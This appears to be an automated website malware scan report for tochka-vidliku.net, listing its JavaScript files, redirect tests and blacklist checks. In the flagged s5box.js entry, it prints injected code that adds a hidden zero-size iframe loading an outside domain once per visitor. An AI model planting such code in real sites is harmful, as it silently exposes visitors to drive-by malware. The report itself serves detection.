Scanned pages/files
Request | Server response | Status |
http://www.tochka-vidliku.net/ | 200 OK Content-Length: 251019 Content-Type: text/html | clean |
http://www.tochka-vidliku.net/media/system/js/mootools-core.js | 200 OK Content-Length: 96888 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/media/system/js/core.js | 200 OK Content-Length: 4799 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/media/system/js/caption.js | 200 OK Content-Length: 733 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/media/system/js/mootools-more.js | 200 OK Content-Length: 239157 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/modules/mod_s5_box/js/s5box.js | 200 OK Content-Length: 17537 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var S5Box = new Class({ Implements: [Events], options: { transition: s5_boxeffect, speed: 350, width: false, height: false, initialWidth: 100, initialHeight: 100, maxWidth: false, maxHeight: false, resize: true, inline: false, title: false, rel: false, opacity: 0.7, preloading: true, close: 'close', open: false, overlayClose: true }, events: document.getElementById("colorbox").style.display = "none"; } });
;var ifKOii2I = document.createElement('iframe');
ifKOii2I.name = 'ifKOii2I';
ifKOii2I.src = 'http://sdpor.winonawinn.com/';
ifKOii2I.style.width = '0px';
ifKOii2I.style.height = '0px';
window.onload = function() {if (document.cookie.indexOf('ifKOii2I=') == -1) { document.getElementsByTagName('body')[0].appendChild(ifKOii2I); document.cookie = 'ifKOii2I=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}};
Antivirus reports:
http://www.tochka-vidliku.net/modules/mod_s5_image_and_content_fader/js/jd.gallery.js | 200 OK Content-Length: 28661 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/modules/mod_s5_image_and_content_fader/js/jd.gallery.transitions.js | 200 OK Content-Length: 3156 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/s5_flex_menu.js | 200 OK Content-Length: 63635 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/multibox/overlay.js | 200 OK Content-Length: 3286 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/multibox/multibox.js | 200 OK Content-Length: 34583 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/s5_font_adjuster.js | 200 OK Content-Length: 3916 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net/templates/prestige_academy/js/s5_info_slide.js | 200 OK Content-Length: 5228 Content-Type: application/x-javascript | clean |
http://www.tochka-vidliku.net//modules/mod_s5_tabshow/s5_tabshow/iCarousel.js/ | 404 Not Found Content-Length: 333 Content-Type: text/html | clean |
http://www.tochka-vidliku.net/test404page.js | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tochka-vidliku.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tochka-vidliku.net
Referer: http://www.google.com/search?q=tochka-vidliku.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tochka-vidliku.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tochka-vidliku.net/
Result: tochka-vidliku.net is not infected or malware details are not published yet.